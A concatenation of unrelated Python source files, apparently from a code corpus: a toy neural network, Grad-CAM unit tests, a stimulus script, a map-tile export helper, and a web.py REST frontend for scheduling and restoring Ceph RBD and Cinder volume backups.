# "kotlin_other_libs.spark-kotlin": 1017,
# "kotlin_other_libs.javalin": 1018,
# "kotlin_other_libs.http4k": 1019,
# "kotlin_other_libs.Kluent": 1020,
# "kotlin_other_libs.koin": 1021,
# "kotlin_other_libs.ktlint": 1022,
# "kotlin_other_libs.kscript": 1023,
# "kotlin_other_libs.Spring": 1024,
# "kotlin_other_libs.Spring Boot": 1025,
# "kotlin_other_libs.Vert_x for Kotlin": 1026,
# "kotlin_other_libs.Arrow": 1027,
# "kotlin_other_libs.RxBinding": 1028,
# "kotlin_other_libs.Okio": 1029,
# "kotlin_other_libs.DBFlow": 1030,
# "kotlin_other_libs.Material Dialogs": 1031,
# "kotlin_other_libs.Other": 1032
# },
# "pull_requests": {
# "pull_requests": 519
# }
# }
#
| StarcoderdataPython |
1632539 | from .matrix import Matrix
import math
__all__=["ActivationFunction","NeuralNetwork","SIGMOID","TANH"]
class ActivationFunction:
def __init__(self,f,df):
self.f=f
self.df=df
SIGMOID=ActivationFunction(
lambda v,*a:1/(1+math.exp(-v)),
lambda v,*a:v*(1-v)
)
TANH=ActivationFunction(
lambda v,*a:math.tanh(v),
lambda v,*a:1-(v**2)
)
class NeuralNetwork:
def __init__(self,input_,hidden=None,output=None,lr=0.01):
if (type(input_)==dict):
self.fromJSON(input_)
else:
self.i=input_
self.h=hidden+[output]
self.wl=[]
self.bl=[]
for k in range(0,len(self.h)):
s=(self.i if k==0 else self.h[k-1])
e=self.h[k]
self.wl.append(Matrix(e,s).randomize())
self.bl.append(Matrix(e,1).randomize())
self.lr=lr
def predict(self,i):
o=Matrix.from_array(i)
for k in range(0,len(self.h)):
o=Matrix.mult(self.wl[k],o)
o=Matrix.add(o,self.bl[k])
o=o.map(SIGMOID.f)
return o.to_array()
def train(self,i,t):
def lrn(l1,l2,w,b,e,df,lr):
g=Matrix.mapN(l2,df)
g.multN(e)
g.multS(lr)
d=Matrix.transpose(l1)
d=Matrix.mult(g,d)
w=Matrix.add(w,d)
b=Matrix.add(b,g)
return w,b
i=Matrix.from_array(i)
ol=[]
for k in range(0,len(self.h)):
s=(i if k==0 else ol[-1])
o=Matrix.mult(self.wl[k],s)
o=Matrix.add(o,self.bl[k])
ol.append(o.map(SIGMOID.f))
t=Matrix.from_array(t)
e=Matrix.sub(t,ol[-1])
for k in range(len(self.h)-1,-1,-1):
s=(ol[k-1] if k>0 else i)
self.wl[k],self.bl[k]=lrn(s,ol[k],self.wl[k],self.bl[k],e,SIGMOID.df,self.lr)
lw=Matrix.transpose(self.wl[k])
e=Matrix.mult(lw,e)
def train_multiple(self,d,t,log=True):
l=-1
for i in range(0,t):
if (log==True and int(i/t*100)>l):
l=int(i/t*100)
print(f"{l}% complete...")
for k in d:
self.train(k[0],k[1])
def test(self,d,log=True):
if(log==True):
print("TEST".center(40,"="))
a=[]
for k in d:
o=self.predict(k[0])
if(log==True):
print(f"Input: {str(k[0])}\tTarget Output: {str(k[1])}\tOutput: {str(o)}")
a+=Matrix.diff(Matrix.from_array(k[1]),Matrix.from_array(o)).to_array()
return round((1-sum(a)/len(a))*10000)/100
def toJSON(self):
wl=[]
for k in self.wl:
wl.append(k.data)
bl=[]
for k in self.bl:
bl.append(k.data)
json={"i":self.i,"hl":self.h,"wl":wl,"bl":bl,"lr":self.lr}
return json
def fromJSON(self,json):
self.i=json["i"]
self.h=json["hl"]
self.wl=[]
for k in json["wl"]:
self.wl.append(Matrix(len(k[0]),len(k)).fill(k))
self.bl=[]
for k in json["bl"]:
self.bl.append(Matrix(len(k[0]),len(k)).fill(k))
self.lr=json["lr"]
| StarcoderdataPython |
54003 | # Copyright 2017 Neosapience, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ========================================================================
import unittest
import darkon
import tensorflow as tf
import numpy as np
_classes = 2
def nn_graph(activation):
# create graph
x = tf.placeholder(tf.float32, (1, 2, 2, 3), 'x_placeholder')
y = tf.placeholder(tf.int32, name='y_placeholder', shape=[1, 2])
with tf.name_scope('conv1'):
conv_1 = tf.layers.conv2d(
inputs=x,
filters=10,
kernel_size=[2, 2],
padding="same",
activation=activation)
with tf.name_scope('fc2'):
flatten = tf.layers.flatten(conv_1)
top = tf.layers.dense(flatten, _classes)
logits = tf.nn.softmax(top)
return x
class GradcamGuidedBackprop(unittest.TestCase):
def setUp(self):
tf.reset_default_graph()
def tearDown(self):
x = nn_graph(activation=self.activation_fn)
image = np.random.uniform(size=(2, 2, 3))
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
gradcam_ops = darkon.Gradcam.candidate_featuremap_op_names(sess)
if self.enable_guided_backprop:
_ = darkon.Gradcam(x, _classes, gradcam_ops[-1])
g = tf.get_default_graph()
from_ts = g.get_operation_by_name(gradcam_ops[-1]).outputs
to_ts = g.get_operation_by_name(gradcam_ops[-2]).outputs
max_output = tf.reduce_max(from_ts, axis=3)
y = tf.reduce_sum(-max_output * 1e2)
grad = tf.gradients(y, to_ts)[0]
grad_val = sess.run(grad, feed_dict={x: np.expand_dims(image, 0)})
if self.enable_guided_backprop:
self.assertTrue(not np.any(grad_val))
else:
self.assertTrue(np.any(grad_val))
def test_relu(self):
self.activation_fn = tf.nn.relu
self.enable_guided_backprop = False
def test_relu_guided(self):
self.activation_fn = tf.nn.relu
self.enable_guided_backprop = True
def test_tanh(self):
self.activation_fn = tf.nn.tanh
self.enable_guided_backprop = False
def test_tanh_guided(self):
self.activation_fn = tf.nn.tanh
self.enable_guided_backprop = True
def test_sigmoid(self):
self.activation_fn = tf.nn.sigmoid
self.enable_guided_backprop = False
def test_sigmoid_guided(self):
self.activation_fn = tf.nn.sigmoid
self.enable_guided_backprop = True
def test_relu6(self):
self.activation_fn = tf.nn.relu6
self.enable_guided_backprop = False
def test_relu6_guided(self):
self.activation_fn = tf.nn.relu6
self.enable_guided_backprop = True
def test_elu(self):
self.activation_fn = tf.nn.elu
self.enable_guided_backprop = False
def test_elu_guided(self):
self.activation_fn = tf.nn.elu
self.enable_guided_backprop = True
def test_selu(self):
self.activation_fn = tf.nn.selu
self.enable_guided_backprop = False
def test_selu_guided(self):
self.activation_fn = tf.nn.selu
self.enable_guided_backprop = True
def test_softplus(self):
self.activation_fn = tf.nn.softplus
self.enable_guided_backprop = False
def test_test_softplus_guided(self):
self.activation_fn = tf.nn.softplus
self.enable_guided_backprop = True
def test_softsign(self):
self.activation_fn = tf.nn.softsign
self.enable_guided_backprop = False
def test_softsign_guided(self):
self.activation_fn = tf.nn.softsign
self.enable_guided_backprop = True
| StarcoderdataPython |
184951 | class FlowException(Exception):
"""Internal exceptions for flow control etc.
Validation, config errors and such should use standard Python exception types"""
pass
class StopProcessing(FlowException):
"""Stop processing of single item without too much error logging"""
pass
| StarcoderdataPython |
123196 | <reponame>chrox/RealTimeElectrophy
# Generate random orientation and spatial frequency gratings.
#
# Copyright (C) 2010-2011 <NAME>
#
# See LICENSE.TXT that came with this file.
from __future__ import division
from StimControl.LightStim.SweepSeque import ParamSeque
from StimControl.LightStim.FrameControl import FrameSweep
from StimControl.LightStim.Grating import ParamMapGrating
from StimControl.LightStim.Core import DefaultScreen
from StimControl.LightStim.LightData import dictattr,IndexedParam
DefaultScreen(['left','right'])
p = dictattr()
p.ml = 0.5
p.tfreqCycSec = 2.0
p.bgbrightness = 0.0
p.phase0 = 0
p.contrast = 1
orientation = IndexedParam('orientation_180')
spatial_freq = IndexedParam('spatial_freq')
phase_at_t0 = [None]
param_sequence = ParamSeque(repeat=4, orientation=orientation, spatial_freq=spatial_freq, phase_at_t0=phase_at_t0, frame_duration=0.1, blank_duration=0.0)
random_grating = ParamMapGrating(viewport='left', params=p, sweepseq=param_sequence)
sweep = FrameSweep()
sweep.add_stimulus(random_grating)
sweep.go() | StarcoderdataPython |
193857 | import subprocess
from .utils import logging, cwd
logger = logging.getLogger(__name__)
def export_tiles(r_row, vector_data, _):
r_id = r_row['id']
for v_row in vector_data:
v_id = v_row['id']
output_path = cwd / f'../outputs/data/{v_id}_{r_id}.mbtiles'
output_path.parent.mkdir(parents=True, exist_ok=True)
tmp_path = cwd / f"../tmp/vectors/{v_id}_{r_id}.geojsonl"
subprocess.run([
'tippecanoe',
'--detect-shared-borders',
'--drop-densest-as-needed',
'--force',
f'--layer={v_id}_{r_id}',
'--maximum-zoom=10',
'--no-tile-size-limit',
'--read-parallel',
'--simplify-only-low-zooms',
f'--output={output_path}',
tmp_path,
], stderr=subprocess.DEVNULL)
logger.info(f'exported {r_id} vector tiles')
| StarcoderdataPython |
1712120 | #!/usr/bin/python
''' The Snappy Frontend
REST commands for:
Backup (backup a volume)
Restore (restore a volume from a backup)
List (view details about submitted Snappy jobs)
are received and processed.
The frontend interacts with the Snappy Database.
If Cinder is being backed up, then credientials for the Cinder (Openstack) DB
are required in the env-snappy-fe.src file.
'''
# Verions:
# 0.5.4: source_type and source_id are required fields for a Backup request
# 0.5.5: restore to a different volume feature added
# 0.5.6: support for S3 target plugin
# 0.5.7: tablesEditor added
# 0.5.7.1: "auth_type" added as a field to Tenants local DB
# 0.5.7.2: authorization checks moved to "authCheck.py"
# 0.5.7.3: check authorization for all Restore requests
# 0.5.7.4: Restore requests can proceed without access to RBD command
# 0.5.7.5: List (Human readable) translates state number to state description
# 0.5.8: support for source_type "localdirectory" added
# 0.5.8.1: the process ID is written to frontend.pid when frontend.py starts
# 0.5.8.2: tablesEditor now supports the "localdirectory" source
# 0.6.0: support for getting Cinder information from an agent
import authCheck
import sqlite3
import sys
import re
import os
import os.path
import subprocess
import json
import web
import distutils.spawn
from snappy_db_utils.replacestatenum import describe_state_column
URLS = ('/', 'Index',
'/v2/(.+)/jobs/full', 'FullListV2All',
'/v2/(.+)/jobs/full/', 'FullListV2All',
'/v2/(.+)/jobs/full.txt', 'FullListV2All',
'/v2/(.+)/jobs/full/.txt', 'FullListV2All',
'/v2/(.+)/jobs/full/(.+)', 'FullListV2Single',
'/v2/(.+)/jobs/summary', 'SummaryListV2All',
'/v2/(.+)/jobs/summary/', 'SummaryListV2All',
'/v2/(.+)/jobs/summary.txt', 'SummaryListV2All',
'/v2/(.+)/jobs/summary/.txt', 'SummaryListV2All',
'/v2/(.+)/jobs/summary/(.+)', 'SummaryListV2Single',
'/v2/(.+)/jobs', 'AddV2',
'/v2/(.+)/jobs/', 'AddV2',
'/v2/(.+)/jobs/(.+)', 'RestoreV2')
VERSION = "0.6.0"
index_msg = '{"status":"Snappy Frontend is running. Submit REST commands to use.","version":"' + VERSION + '"}'
APP = web.application(URLS, globals())
class Index:
''' The index URL '''
def GET(self):
return index_msg
def POST(self):
return index_msg
def list_main(full_listing, use_json, job_id):
'''
There are 8 different options for listing the Snappy DB contents:
(full/summary) x (JSON/human readable) x (single/all jobs)
'''
list_output = ""
# Full Listings
if full_listing is True:
# JSON
if use_json is True:
# All
if job_id == 0:
list_output = subprocess.check_output("snappy_db_utils/getfulltablejson.py")
# Single
else:
cmd_str = "snappy_db_utils/getsingletablejson.py " + job_id
list_output = subprocess.check_output(cmd_str.split())
# Human Readable
else:
# All
if job_id == 0:
list_output = subprocess.check_output("snappy_db_utils/listall")
# Single
else:
cmd_str = "snappy_db_utils/listsingle " + job_id
list_output = subprocess.check_output(cmd_str.split())
#Summary Listing
else:
# JSON
if use_json is True:
# All
if job_id == 0:
list_output = subprocess.check_output("snappy_db_utils/getfullsummaryjson.py")
# Single
else:
cmd_str = "snappy_db_utils/getsinglesummaryjson.py " + job_id
list_output = subprocess.check_output(cmd_str.split())
# Human Readable
else:
# All
if job_id == 0:
list_output = subprocess.check_output("snappy_db_utils/listsummary")
# Single
else:
cmd_str = "snappy_db_utils/listsummarysingle " + job_id
list_output = subprocess.check_output(cmd_str.split())
return list_output
def verify_restore_data():
'''
Make sure than the POST data was passed in as valid JSON
and the required data is included: (restore_type, restore_id)
'''
# default values
restore_type = "abc"
restore_id = "123456789"
return_str = '{"status":"input valid"}'
# Make sure the data is in JSON format
try:
item_dict = json.loads(web.data())
except:
return_str = '{"status":"ERROR: valid JSON not found in POST data"}'
return return_str, restore_type, restore_id
# Get the restore_type info
try:
restore_type = item_dict["restore_type"]
except KeyError:
return_str = '{"status":"ERROR: field <restore_type> not found in POST data"}'
return return_str, restore_type, restore_id
# Get the restore_id info
try:
restore_id = item_dict["restore_id"]
except KeyError:
return_str = '{"status":"ERROR: <restore_id> not found in POST data"}'
return return_str, restore_type, restore_id
return return_str, restore_type, restore_id
def restore_main(tenant_id, job_id):
''' Process a RESTORE command '''
data = {}
if "no data" in job_id:
data['status'] = 'error_msg: no job_id given'
elif not isPosInt(job_id):
data['status'] = 'error_msg: job_id ' + job_id + ' is not valid'
else:
cmd_str = "snappy_db_utils/does_snappy_jobid_exist " + job_id
job_exists_str = subprocess.check_output(cmd_str.split()).strip()
if len(job_exists_str) > 0:
cmd_str = "snappy_db_utils/get_jobtype_from_jobid " + job_id
jobtype = subprocess.check_output(cmd_str.split()).strip()
# check to see if Authentication is needed
# and if so, if the creditials are correct
auth = web.ctx.env.get('HTTP_AUTHORIZATION')
if authCheck.is_authorized(tenant_id, auth) is False:
web.header('WWW-Authenticate', 'Basic realm="Snappy Frontend"')
web.ctx.status = '401 Unauthorized'
return '{"status":"ERROR: Authentication failed for tenant <' + tenant_id + '>"}'
rbd_verified = "false"
if "export" in jobtype:
cmd_str = "snappy_db_utils/get_src_image_from_jobid " + job_id
image_id = subprocess.check_output(cmd_str.split()).strip()
### Restore to a diffrent volume
if (len(web.data()) > 0):
is_valid, restore_type, restore_id = verify_restore_data()
if ("input valid" not in is_valid):
return is_valid
return_str = '{"status":"restore to a different volume"}'
if "cinder_id" in restore_type:
cinder_backed_by = cinder_id_to_backing_type(restore_id)
if len(cinder_backed_by) < 1:
return '{"status":"ERROR: cinder_id <' + restore_id + '> not found"}'
elif "rbd" in cinder_backed_by:
restore_type = "rbd"
restore_id = cinder_id_to_rbd(restore_id)
# else if "lvm" in cinder_backed_by
# (and other ways to back cinder)
# check to see if this restore_type is supported
cmd_str = "builder_utils/get_src_id_from_sp_name " + restore_type
restore_type_valid = subprocess.check_output(cmd_str.split()).strip()
if (len(restore_type_valid) == 0):
return '{"status":"error: restore_type <' + restore_type + '> is not supported"}'
# do we have access to the rbd command to make verification check on it??
if does_cmd_exist("rbd") is True:
# check that the volume <restore_id> exists (the volume we are restoring to)
cmd_str = "openstack_db_utils/does_rbd_volume_exist.py " + restore_id
id_exists = subprocess.check_output(cmd_str.split())
if (id_exists.strip() == "false"):
return_txt = '{"status":"ERROR: Cannot restore to ' + restore_type
return_txt += ' volume <' + restore_id + '> since it does not exist"}'
return return_txt
# get the size of <restore_id> (the volume we are restoring to)
cmd_str = "openstack_db_utils/get_rbd_size_in_bytes.py " + restore_id
restore_volume_size = subprocess.check_output(cmd_str.split()).strip()
# get the allocated size of the backed up volume
cmd_str = "snappy_db_utils/get_alloc_size_from_jobid " + job_id
alloc_size = subprocess.check_output(cmd_str.split()).strip()
# check that the size <restore_id> is >= allocated size
if int(restore_volume_size) < int(alloc_size):
return_str = '{"status":"ERROR: Not enough space. Backup is ' + alloc_size
return_str += ' bytes but volume to restore to is only ' + restore_volume_size + ' bytes."}'
return return_str
# if all of those checks are valid, then it is considered "verified"
rbd_verified = "true"
data['restore_to_volume_id'] = restore_id
# Restore to a volume that is not the original one
cmd_str = "./restore_to_different_volume "
cmd_str += restore_id + " "
cmd_str += job_id + " "
cmd_str += restore_type
new_job_id_str = subprocess.check_output(cmd_str.split())
# restore to original volume
else:
# do we have access to the "rbd" command to make verification checks on it?
if does_cmd_exist("rbd") is True:
# first make sure that the original volume still exists
# assume it's the same size as it was before
cmd_str = "openstack_db_utils/does_rbd_volume_exist.py " + image_id
rbd_vol_exists = subprocess.check_output(cmd_str.split())
if "true" in rbd_vol_exists:
# Restore back to the original volume
rbd_verified = "true"
elif "unknown" in rbd_vol_exists:
pass
else:
return_str = '{"status":"ERROR: Request to restore job <' + job_id
return_str += '> to the orignal RBD volume <' + image_id
return_str += '>, but it does not exist"}'
return return_str
cmd_str = "./restore_to_original_volume " + image_id + " " + job_id
new_job_id_str = subprocess.check_output(cmd_str.split())
# clean up the output
new_job_id_str = new_job_id_str.split("\n", 1)[-1].strip("\n")
data['rbd_verified'] = rbd_verified
data['status'] = 'Restore submitted'
data['restore_from_job_id'] = job_id
data['image_id'] = image_id
data['job_id'] = new_job_id_str
else:
status_str = 'error_msg: job ' + job_id
status_str += ' is type ' + jobtype
status_str += '. It must be an export.'
data['status'] = status_str
else:
data['status'] = 'error_msg: job ' + job_id + ' does not exist'
return_txt = json.dumps(data)
return return_txt
def no_tenant_error(tenant_name):
return '{"status":"error_msg: tenant ' + tenant_name + ' does not exist"}'
class RestoreV2:
'''
Restore a volume given a backup job_id
Error cases: (1) no job_id given
(2) job_id doesn't exist
(3) job_id isn't an export
'''
def POST(self, tenant_id, job_id):
''' Restore is a POST command '''
if does_tenant_exist(tenant_id) is False:
return no_tenant_error(tenant_id)
return restore_main(tenant_id, job_id)
# There will be multiple sources that can be backed up as a Ceph RBD volume.
# To do this, we'll need a "layer" that translates from that source's ID
# to the RBD ID that is backing it.
#
# Here we have have:
# - Cinder Volumes
# - Kubernetes Persitent Volume Claims
# - Kubernetes Persistent Volumes
#
def cinder_id_to_backing_type(cinder_id):
''' Get the backing type for a Cinder Volume from its ID '''
cmd_str = "openstack_db_utils/get_cinder_volume_type_via_agent " + cinder_id
cinder_backed_by = subprocess.check_output(cmd_str.split()).strip("\n")
return cinder_backed_by
def cinder_id_to_rbd(cinder_id):
''' Translate Cinder to RBD '''
cmd = "openstack_db_utils/get_rbd_from_cinder_via_agent " + cinder_id
rbd_id = subprocess.check_output(cmd.split()).strip("\n")
return rbd_id
def rbd_to_rbd(rbd_id):
''' Translate RBD to RBD '''
return rbd_id
def kubernetes_pv_to_rbd(kubernetes_pv_id):
''' Translate Kubernetes PV to RBD '''
cmd = "./kubernetes_utils/getRBDfromPV.py " + kubernetes_pv_id
rbd_id = subprocess.check_output(cmd.split()).strip("\n")
return rbd_id
def kubernetes_pvc_to_pv(kubernetes_pvc_id):
''' Translate Kubernetes PVC to PV '''
cmd = "./kubernetes_utils/getPVfromPVC.py " + kubernetes_pvc_id
pv_id = subprocess.check_output(cmd.split()).strip("\n")
return pv_id
def is_int(s):
try:
int(s)
return True
except ValueError:
return False
# the "notes" field is optional, but if it exists, we will pass it do the Snappy DB
def get_localdirectory_notes():
notes_str = "put notes here"
# The data was not in JSON format
try:
item_dict = json.loads(web.data())
except:
return notes_str
try:
notes_str = item_dict["notes"]
except KeyError:
return notes_str
return notes_str
def verify_add_data():
# Make sure than the POST data was passed in as valid JSON
# and the required data is included
# default values
count = "1"
full_interval = "604800" # 1 week
delta_interval = "0"
sourcetype = "rbd"
sourceid = "123456789"
result = '{"status":"input valid"}'
# If there's no data passed into this command, we'll catch it here.
# This can happen if a Restore command was sent but there was
# no job_id given in the URL, since it'll be interpreted as an Add
if (len(web.data()) == 0):
return_str = '{"status":"ERROR: Data has length 0"}'
return return_str, "-1", "-1", "-1", "-1", "-1"
# The data was not in JSON format
try:
item_dict = json.loads(web.data())
except:
return_str = '{"status":"ERROR: valid JSON not found in POST data"}'
return return_str, sourcetype, sourceid, count, full_interval, delta_interval
# Get the full_interval info
try:
full_interval = item_dict["full_interval"]
except KeyError:
return_str = '{"status":"ERROR: field <full_interval> not found in POST data"}'
return return_str, sourcetype, sourceid, count, full_interval, delta_interval
if is_int(full_interval) is False or int(full_interval) < 1:
return_str = '{"status":"ERROR: <full_interval> is not a positive integer ('+ full_interval +')"}'
return return_str, sourcetype, sourceid, count, full_interval, delta_interval
# Get the delta_interval info (this field is not required)
try:
delta_interval = item_dict["delta_interval"]
if is_int(delta_interval) is False or int(delta_interval) < 1:
return_str = '{"status":"ERROR: <delta_interval> is not a positive integer ('+ delta_interval +')"}'
return return_str, sourcetype, sourceid, count, full_interval, delta_interval
except KeyError:
pass
# Get the count info
try:
count = item_dict["count"]
except KeyError:
return_str = '{"status":"ERROR: <count> not found in POST data"}'
return return_str, sourcetype, sourceid, count, full_interval, delta_interval
if is_int(count) is False or int(count) < 1:
return_str = '{"status":"ERROR: <count> is not a positive integer ('+ count +')"}'
return return_str, sourcetype, sourceid, count, full_interval, delta_interval
try:
sourcetype = item_dict["source_type"]
except KeyError:
return_str = '{"status":"ERROR: <source_type> not found in POST data"}'
return return_str, sourcetype, sourceid, count, full_interval, delta_interval
try:
sourceid = item_dict["source_id"]
except KeyError:
return_str = '{"status":"ERROR: <source_id> not found in POST data"}'
return return_str, sourcetype, sourceid, count, full_interval, delta_interval
return result, sourcetype, sourceid, count, full_interval, delta_interval
def does_cmd_exist(cmd):
'''check to see if a command exists before trying to use it'''
output = distutils.spawn.find_executable(cmd)
if output is None:
return False
else:
return True
class AddV2:
''' Add a new backup request to the Snappy Database '''
def POST(self, tenant_id):
''' Add is a POST command '''
if does_tenant_exist(tenant_id) is False:
return no_tenant_error(tenant_id)
# Parse the input
input_verify, original_source_type, original_source_id, count, full_interval, delta_interval = verify_add_data()
if "ERROR" in input_verify:
return input_verify
# check to see if Authentication is needed
# and if so, if the creditials are correct
auth = web.ctx.env.get('HTTP_AUTHORIZATION')
if authCheck.is_authorized(tenant_id, auth) is False:
web.header('WWW-Authenticate', 'Basic realm="Snappy Frontend"')
web.ctx.status = '401 Unauthorized'
return '{"status":"ERROR: Authentication failed for tenant <' + tenant_id + '>"}'
data = {}
source_type = ""
source_id = ""
# original_source_type: what is passed in the REST command
# source_type: what is backed up by Snappy (corresponds to a "source" in the local sqlite DB)
#
# Example: if a Cinder ID is passed in, cinder will be the original_source_type
# but rbd could be the source_type, since that is what is actually backed up
# the following original_source_type values are currently supported:
# - rbd
# - cinder_id
# - kpv (Kubernetes Persistent Volume)
# - kpvc Kubernetes Persistent Volume Claim)
# - localdirectory
# the following source_type values are currently supported:
# - rbd
# - localdirectory
if (original_source_type == "rbd") or (original_source_type == "localdirectory"):
source_type = original_source_type
source_id = original_source_id
elif (original_source_type == "cinder_id"):
# find out what Cinder is backed by
# and what the ID of that backing volume is
# cmd_str="openstack_db_utils/get_cinder_volume_type_via_agent " + original_source_id
# cinder_backing_type = subprocess.check_output(cmd_str.split()).strip("\n")
cinder_backing_type = cinder_id_to_backing_type(original_source_id)
# does this Cinder ID exist
if len(cinder_backing_type) < 2:
return '{"status":"Cinder ID <' + original_source_id + '> does not exist"}'
# is this Cinder ID backed by RBD
if "rbd" in cinder_backing_type:
source_type = "rbd"
source_id = cinder_id_to_rbd(original_source_id)
# An example of how to add more cinder backing types
# elif cinder_backing_type == "iscsi":
# source_type = iscsi
# source_id = cinder_to_iscsi(original_source_id)
else:
return_txt = '{"status":"Cinder ID <' + cid + '> is backed by ' + cinder_backing_type + ', which is not supported'
if ("Null" or "null" in cinder_backing_type):
return_txt += '. The Cinder volume may have been deleted'
return_txt += ' "}'
return return_txt
elif (original_source_type == "kpv" or original_source_type == "kpvc"):
# find out what the Kubernetes Persistent Volume (Claim) is backed by
# and what the ID of that backing volume is
if does_cmd_exist("kubectl") is False:
return '{"status":"error_msg: cmd <kubectl> not found, please submit different source_type (e.g. rbd, cinder)"}'
if (original_source_type == "kpvc"):
# check the PVC, if that was passed in
cmdStr = "kubernetes_utils/doesPVCexist.py " + original_source_id
pvc_exists = subprocess.check_output(cmdStr.split()).strip("\n")
if pvc_exists == "True":
pv = kubernetes_pvc_to_pv(original_source_id).strip("\n")
if len(pv) == 0:
return '{"status":"error_msg: no bound PV found for PVC <' + original_source_id + '>"}'
else:
return '{"status":"error_msg: Kubernetes PVC <' + original_source_id + '> does not exist"}'
if (original_source_type == "kpv"):
kpvid = original_source_id
else:
kpvid = pv
cmdStr = "kubernetes_utils/doesPVexist.py " + kpvid
pv_exists = subprocess.check_output(cmdStr.split()).strip("\n")
if pv_exists == "True":
cmdStr = "kubernetes_utils/isPVbackedbyRBD.py " + kpvid
backedByRBD = subprocess.check_output(cmdStr.split()).strip("\n")
if backedByRBD == "True":
source_type = "rbd"
source_id = kubernetes_pv_to_rbd(kpvid).strip("\n")
else:
return '{"status":"error_msg: Kubernetes PV <' + kpvid + '> is not backed by RBD"}'
else:
return '{"status":"error_msg: Kubernetes PV <' + kpvid + '> does not exist"}'
else:
return '{"status":"error_msg: source_type <' + original_source_type + '> not supported"}'
# Get the source and target profiles associated with this tenant
src_script = "./builder_utils/get_src_id_from_sp_name"
tgt_script = "./builder_utils/get_tgt_id_from_tenant_name"
source_type_num = subprocess.check_output([src_script, source_type]).strip("\n")
target_type_num = subprocess.check_output([tgt_script, tenant_id]).strip("\n")
if len(source_type_num) == 0:
return '{"status":"error_msg: source type <' + source_type + '> not configured"}'
# Submit a new job to the Snappy Database
if (source_type == "rbd"):
# In cases where we don't have access to the rbd command, we can
# still submit jobs, but the RBD volumes are not guaranteed to exist.
# If this happens, the job would result in an error
# Therefore it is preferred that the frontend has access to the RBD command
rbd_verified = "false"
if does_cmd_exist("rbd") is True:
# If we do have access to the rbd command though, check to see that the volume exists
cmd = "openstack_db_utils/does_rbd_volume_exist.py " + source_id
cmd_output = subprocess.check_output(cmd.split())
if "true" in cmd_output:
rbd_verified = "true"
elif "unknown" in cmd_output:
pass
else:
return '{"status":"error_msg: rbd volume <' + source_id + '> not found, will not submit backup request"}'
# compose command to add new rbd backup job
cmd_str ="./add_rbd_backup_single_scheduled_tenants "
cmd_str += source_id + " "
cmd_str += full_interval + " "
cmd_str += count + " "
cmd_str += str(source_type_num) + " "
cmd_str += str(target_type_num) + " "
cmd_str += original_source_type + " "
cmd_str += original_source_id
# execute command
add_return_txt = subprocess.check_output(cmd_str.split())
new_id = add_return_txt.split("\n")[-2]
data['status'] = 'add request for RBD ID <' + source_id + '> submitted'
data['rbd_verified'] = rbd_verified
data['job_id'] = new_id
data['full_interval'] = full_interval
data['delta_interval'] = delta_interval
data['count'] = count
# compose command to add new localdirectory backup job
elif (source_type == "localdirectory"):
cmd_str = "./add_localdirectory_backup_single_scheduled_tenants "
cmd_str += source_id + " "
cmd_str += full_interval + " "
cmd_str += count + " "
cmd_str += str(source_type_num) + " "
cmd_str += str(target_type_num) + " "
cmd_str += original_source_type + " "
cmd_str += original_source_id + " "
cmd2 = cmd_str.split()
notes_text = '"' + get_localdirectory_notes() + '"'
cmd2.append(notes_text)
# execute command
add_return_txt = subprocess.check_output(cmd2)
new_id = add_return_txt.split("\n")[-2]
data['status'] = 'add request for localdirectory <' + source_id + '> submitted'
data['job_id'] = new_id
data['full_interval'] = full_interval
data['delta_interval'] = delta_interval
data['count'] = count
else:
data['status'] = 'ERROR: unknown backing source type <' + source_type + '>'
add_return_txt = json.dumps(data)
return add_return_txt
def isInt(s):
''' is this an integer '''
try:
int(s)
return True
except ValueError:
return False
def isPosInt(i):
''' is this a positive integer '''
answer = False
if isInt(i):
if int(i) > 0:
answer = True
return answer
def verify_list_input_v2(job_id):
''' Verity that the input is valid for a List Single request '''
# initial values
list_output = ""
is_good = False
data = {}
# check to see if the job_id input is valid (is a positive integer)
if not isPosInt(job_id):
data['status'] = 'error_msg: job_id ' + job_id + ' is not valid'
else:
# check to see if the job_id exists, which is an error condition
cmd_str = "snappy_db_utils/does_snappy_jobid_exist " + job_id
job_exists_str = subprocess.check_output(cmd_str.split()).strip()
# if there are no errors (the job_id exists if specified), change is_good to True
# and return the inputs, else return False and an error message.
if len(job_exists_str) > 0 or "no data" in job_id:
is_good = True
else:
data['status'] ='error_msg: job_id ' + job_id + ' does not exist'
list_output = json.dumps(data)
return is_good, list_output, job_id
def does_tenant_exist(tenant_id):
''' Make sure the specified tenant exists '''
tenant_output = subprocess.check_output(["./builder_utils/get_tenant_info", tenant_id])
if len(tenant_output) < 5:
return False
else:
return True
class FullListV2All:
''' A Full list of all of the jobs in the Snappy DB '''
def GET(self, tenant_id):
''' List is a GET command '''
if does_tenant_exist(tenant_id) is False:
return no_tenant_error(tenant_id)
return describe_state_column(list_main(True, ".txt" not in web.ctx.path, 0))
def strip_suffix(string, suffix):
''' Strip off a suffix from a string '''
if string.endswith(suffix):
return string[:-(len(suffix))]
else:
return string
class FullListV2Single:
''' A Full list of a single job in the Snappy DB '''
def GET(self, tenant_id, job_id):
''' List is a GET command '''
if does_tenant_exist(tenant_id) is False:
return no_tenant_error(tenant_id)
job_id = strip_suffix(job_id, ".txt")
is_good, list_output, job_id = verify_list_input_v2(job_id)
if is_good is True:
list_output = describe_state_column(list_main(True, ".txt" not in web.ctx.path, job_id))
return list_output
class SummaryListV2All:
''' A Summary list of all of the jobs in the Snappy DB '''
def GET(self, tenant_id):
''' List is a GET command '''
if does_tenant_exist(tenant_id) is False:
return no_tenant_error(tenant_id)
return describe_state_column(list_main(False, ".txt" not in web.ctx.path, 0))
class SummaryListV2Single:
''' A summary list of one job in the Snappy DB '''
def GET(self, tenant_id, job_id):
''' List is a GET command '''
if does_tenant_exist(tenant_id) is False:
return no_tenant_error(tenant_id)
job_id = strip_suffix(job_id, ".txt")
is_good, list_output, job_id = verify_list_input_v2(job_id)
if is_good is True:
list_output = describe_state_column(list_main(False, ".txt" not in web.ctx.path, job_id))
return list_output
def main():
''' main '''
web.internalerror = web.debugerror
APP.run()
if __name__ == "__main__":
print("Snappy Frontend version " + VERSION)
print("Frontend running with PID " + str(os.getpid()))
fd = open("frontend.pid", "w")
fd.write(str(os.getpid()))
fd.close()
